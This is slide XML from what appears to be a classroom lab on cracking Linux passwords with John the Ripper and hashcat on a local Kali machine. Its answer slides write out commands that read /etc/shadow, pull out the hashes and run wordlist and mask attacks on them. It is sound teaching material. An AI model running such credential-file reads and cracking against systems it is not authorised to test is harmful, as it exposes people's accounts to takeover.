              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>adduser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> dan </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ofTBa11!999</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7512DC9-7887-6D4D-9B87-E7495B135082}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4890977" y="2468708"/>
            <a:ext cx="3252323" cy="2301765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1568623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4351D0-770E-47F9-9980-7DAC2E7A5E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>John</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DD21976-934A-43C2-9631-CB34402F1B66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use john against the shadow file to try and crack the passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a simple wordlist mode with nmap.lst</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Repeated with our mangled wordlist, lab9.lst</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3718747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2" y="1016836"/>
            <a:ext cx="4611189" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Spoiler ahead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{574BB309-77D9-4BB8-BFE8-3EF2AE74EAEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spoiler</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58534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E5DF0E-F99E-4C5B-BF4B-12CBDDE1D09F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>John Answer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2921A73-9E01-4D02-8A22-A6B609F5B061}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>john --wordlist=/usr/share/wordlists/nmap.lst /etc/shadow</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b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> john --wordlist=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>/share/wordlists/lab9.lst /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99BADC10-22F3-DB46-AD55-9F031391F056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2094469" y="1191156"/>
            <a:ext cx="4316964" cy="1642921"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61DF2AAF-5BD3-3C46-A45C-F55DB14382DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1473569" y="3103529"/>
            <a:ext cx="5856620" cy="1790792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1314226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D8ECF3-42F3-4437-8311-B2D5D49E8AD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hashcat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CDD10D9-3029-4B16-A1A6-22F50E1F29F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The input for hashcat is a bit different</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can't just pass it the shadow file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ERROR:</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1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First, extract just the hashes from the shadow file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don't use a text editor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do use bash commands and tools such as grep and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>awk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write the contents to a file, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hashes.lst</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{289A5A7C-5938-1342-9882-B1C4F8B6DA72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2961020" y="1520207"/>
            <a:ext cx="3221959" cy="1893158"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3213464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Placeholder 2"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="51067"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-3175" y="-1588"/>
            <a:ext cx="44831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Building a Password Dictionary list</a:t>
            </a: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59206687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2" y="1016836"/>
            <a:ext cx="4611189" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Spoiler ahead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06F32E56-74B4-4505-A18E-B6531894B9B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spoiler</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A10FAF7-FC1E-4B54-925F-3F1580E01AEF}"/>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782196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45976E-680E-434F-B072-421E24CD071A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hashcat - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>awk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12C3DB86-5933-4830-AA09-2F5768302186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>cat /etc/shadow | grep '\$' | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>awk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -F':' '{print $2 }' &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>hashes.lst</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B03F96CE-AFA9-B345-AC57-149EFF44ADFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066061" y="1444520"/>
            <a:ext cx="7011877" cy="3145199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174121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353238-F177-4CFB-8986-3FEFD43A9955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hashcat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80B7546-5E66-4A99-9632-85904B3747D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next, use hashcat in hybrid wordlist + mask to attack the hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>wordlist = nmap.lst</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>mask = two digits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Force it to run if it cannot use GPU (virtualized Kali)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>output should be to a file called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>hashes.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OPTIONAL: To speed up this lab, shorten the standard nmap.lst</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Pull out the entries that contain the string "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>juni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>" into a shorter list in your working directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>nmap.lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> | grep '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>juni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>' &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>nmap_short.lst</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2096637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2" y="1016836"/>
            <a:ext cx="4611189" cy="707886"/>
